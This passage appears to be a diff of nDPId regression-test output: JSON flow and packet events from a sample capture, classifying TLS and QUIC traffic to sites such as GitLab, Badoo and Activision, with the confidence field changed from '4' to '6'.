Q9O3bHeRpQwTlwh0hRD7WqrIf0Wri9spAJN53856UKZFRupvrVqTH40ht5wGl2g3HXmJvEKnWBsD1hEB3sacVd4lWjKim62JMTY6yUmMhRBlNu2AupnyFsChUJ1NgsRbg5cQPowXRIBVG8WcjCs7OHKUH\/zza5xjXEz1FrdKQASDLCvFyh9YUzlRmDx7d99nX5vf9AwJejikY1uel\/yRMHcT9IqYO0kZBeGiX2ZDJD7vD1sF+05Qq++ztAL3CTqhuU\/7KSbWKiGOoFGj9phj6fZiE+g9e7+HIVuvPAKr+aSbxS71gHelt+hKMcDj7jdDFk5P6TqQdUXfqrnN38RDusNZmvWB+23Sj9NvIjlpua1MtXRWVJaLY5mX9AL1kTENCHtxomZwiXSqkSWtzS8dZocOlqjfWrd2hnw5yl8b7T0843OsmN6ZOoho4X9bhFw\/52C+NFDBAC42\/6jsH2i4NdbJBqOAuf4tLWi3oaJ\/0r5Y0wWyVnBbFtq1sx6d6EHxqir52O50dkkD8SF7j+wGSCG2L1l5bcQGnAqpzpZNB8AgofMTbrgYgdYIyrh\/neffOlCQyXy2EgLb\/xWEt+QftF8p5n2FzevDADqTCGGVeWULgrEsb\/3qULNf4uZHaY4HBD6To7yTuITvaXdqFt30MJBKnhBexi0dhA\/MGpMyVJfR\/PhbhWZmiNdx\/LRAV2Semg\/nPWe+DzSBBXm7wJXZiE\/8ewkRVdkujJi\/QhXAX0aOL76X77YYeny\/V35WiIqUmuxRHrBRdP5AMMQo\/adJoX4bzVdEvw3cGw7\/\/hO2VzwL5m0trABzWAWdjRjsrTEu\/mWAVCZDP5\/peoG8YXeXsdHWwpRLyNJpzOlRz5aND24Jgn5x2v3PqoD5RBiIEHwD8jlV2fRCZXq1e7tPV6eLhSI74="} -00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"},"quic": {"client_requested_server_name":"classroom.google.com","user_agent":"Chrome\/97.0.4692.99 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3","ja3":"a27a03a8478393fe7f8958648bb71ff4","tls_supported_versions":"TLSv1.3"}} -00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1642584017659,"flow_last_seen":1642584019409,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6590,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"}} +00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"},"quic": {"client_requested_server_name":"classroom.google.com","user_agent":"Chrome\/97.0.4692.99 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3","ja3":"a27a03a8478393fe7f8958648bb71ff4","tls_supported_versions":"TLSv1.3"}} +00684{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1642584017659,"flow_last_seen":1642584019409,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6590,"flow_avg_l4_payload_len":219,"midstream":0,"thread_ts_msec":1643355518166,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"23.12.104.83","src_port":39248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AccuWeather","breed":"Fun","category":"Web"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","packets-captured":316,"packets-processed":315,"total-skipped-flows":0,"total-l4-payload-len":129271,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":9,"total-updates":0,"current-active-flows":1,"total-active-flows":9,"total-idle-flows":8,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":1646482623895} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482623895,"flow_last_seen":1646482623895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482623895,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1646482623895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482623895,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8U5dAAEAGwa7AqAGAH95DcIjuAbuZU7+5AAAAAKAC+vB+rAAAAgQFtAQCCAqYsCyFAAAAAAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1646482623937,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482623937,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADIGI04f3kNwwKgBgAG7iO5SHRbemVO\/uoASa9CRawAAAgQFUAEBBAIBAwMH"} 01155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1646482623941,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482623941,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItU5lAAEAGv7vAqAGAH95DcIjuAbuZU7+6Uh0W31AYAfZFAQAAFgMBAgABAAH8AwM7S+zQhzGHYgeM16HLoV5Lvv0qFp3\/Q9lLhcf6NGzgACCV4MycI1TbPUTQp0gTtBJdGxhCWPX0NxBb4Keh1UEhIQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA13d3cuYmFkb28uY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIDy\/wV7uHvn89KVxoNawBj6O\/1N7J\/Rv6ROuT\/L2i752ABcAQQR8rtiFUa3yYRs4u6Ro\/84M9BXHGtIJp6HdzCSQRE\/jjRMPOqb5+WU5M\/Rwa3rXtSAPp6MS0Mul28MptoKZ2BK0ACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482623895,"flow_last_seen":1646482623941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482623941,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"}} +00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":318,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482623895,"flow_last_seen":1646482623941,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482623941,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00934{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":319,"source":"sites.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482623895,"flow_last_seen":1646482623982,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1380,"flow_tot_l4_payload_len":1897,"flow_avg_l4_payload_len":474,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"31.222.67.112","src_port":35054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Badoo","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.badoo.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1643355518166,"flow_last_seen":1643355518166,"flow_idle_time":200000,"flow_min_l4_payload_len":1250,"flow_max_l4_payload_len":1250,"flow_tot_l4_payload_len":1250,"flow_avg_l4_payload_len":1250,"midstream":0,"thread_ts_msec":1646482623982,"l3_proto":"ip4","src_ip":"192.168.1.123","dst_ip":"216.58.209.46","src_port":59102,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleClassroom","breed":"Safe","category":"Collaborative"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482634412,"flow_last_seen":1646482634412,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482634412,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1646482634412,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482634412,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8ehBAAEAGVvPAqAGArEH7TtLuAburPYAuAAAAAKAC+vCVcQAAAgQFtAQCCAoaoTMuAAAAAAEDAwc="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":321,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1646482634431,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1646482634431,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA0AABAADkG2AusQftOwKgBgAG70u5kgyMxqz2AL4AS\/\/99tgAAAgQFeAEBBAIBAwMK"} 01152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1646482634434,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":571,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":571,"pkt_l4_len":537,"thread_ts_msec":1646482634434,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAItehJAAEAGVQDAqAGArEH7TtLuAburPYAvZIMjMlAYAfajwgAAFgMBAgABAAH8AwNOB4Gzi6+YArAvzkfwrorK9DEddM7BFl3e3mWx5EKfGSCorzDjbh21t2eWZKubSdOdkcLfUyHi+FUzEXYnC03sBQAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAATABEAAA53d3cuZ2l0bGFiLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACA5FC8LVJQpX7CGnPMJyGCVSqmP\/UlOQqTKt4aSCzonPAAXAEEEf41WX9lKjs6LoM+3mxjeublwFG7G1\/kkw4gmsHPLzdToe\/hXlsiK3SyaMLeOC3M5q1ZNvI72xevTMYH\/wlBkVwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482634412,"flow_last_seen":1646482634434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482634434,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482634459,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00895{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":322,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482634412,"flow_last_seen":1646482634434,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482634434,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00936{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"sites.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482634412,"flow_last_seen":1646482634459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1977,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1646482634459,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"172.65.251.78","src_port":53998,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GitLab","breed":"Fun","category":"Collaborative"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.gitlab.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482646628,"flow_last_seen":1646482646628,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482646628,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1646482646628,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646628,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8eQxAAEAGb\/bAqAGAAhGNgKZUAbv+Ru5OAAAAAKAC+vDfwAAAAgQFtAQCCAp7uQs2AAAAAAEDAwc="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":325,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1646482646646,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482646646,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADgG8QICEY2AwKgBgAG7plR0ThXR\/kbuT6AS\/oh2XAAAAgQFtAQCCAqpkTIKe7kLNgEDAwc="} 01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1646482646648,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482646648,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5eQ5AAEAGbffAqAGAAhGNgKZUAbv+Ru5PdE4V0oAYAfbaKAAAAQEICnu5C0qpkTIKFgMBAgABAAH8AwMSh5Kk8yD8gdWVB2YFzzg9KRBCWJ\/pzlApBrokxgf2OCBs84UpHDw4uY4jKpCVZJzZAhJUrEs0AlJ7gTtfJSwiWgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAXABUAABJ3d3cuYWN0aXZpc2lvbi5jb20AFwAA\/wEAAQAACgAOAAwAHQAXABgAGQEAAQEACwACAQAAIwAAABAADgAMAmgyCGh0dHAvMS4xAAUABQEAAAAAACIACgAIBAMFAwYDAgMAMwBrAGkAHQAg40qefHDImQJEkibGm9hnpGwl44lKo4KOQS8qsLRSATsAFwBBBPNBVrG5A+ZLqrow1aQOaEgsW+53RcPAplpAt8ULtljoAJH8CjL7YTSZ+PIOiRhMhirRlex47cXc5PiOAFYE9T0AKwAFBAMEAwMADQAYABYEAwUDBgMIBAgFCAYEAQUBBgECAwIBAC0AAgEBABwAAkABABUAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00893{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482646628,"flow_last_seen":1646482646648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482646648,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00949{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":327,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482646628,"flow_last_seen":1646482646665,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482646665,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"35af4c8cd9495354f7d701ce8ad7fd2d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -02301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":330,"source":"sites.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1646482646628,"flow_last_seen":1646482646669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5461,"flow_avg_l4_payload_len":780,"midstream":0,"thread_ts_msec":1646482646669,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"2.17.141.128","src_port":42580,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Activision","breed":"Fun","category":"Game"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.activision.com","server_names":"www.benefitsforeveryworld.com,worldseriesofwarzone.com,treyarch.com,toysforbob.com,spyrothedragon.com,sledgehammergames.com,skylanders.com,sierragames.com,sekirothegame.com,ravensoftware.com,preview.demonware.net,infinityward.com,highmoonstudios.com,highmoon.com,guitarhero.com,europeanwarzoneseries.com,demonware.net,crashbandicoot.com,cdn.gh5.ps3.guitarhero.com,callofdutyleague.com,callofdutyendowment.org,callofdutyendowment.com,callofduty.com,benefitsforeveryworld.com,activisionretail.com,activisionblizzardmedia.com,activisionblizzard.com,activision.com,*.worldseriesofwarzone.com,*.treyarch.com,*.toysforbob.com,*.support.activision.com,*.spyrothedragon.com,*.sledgehammergames.com,*.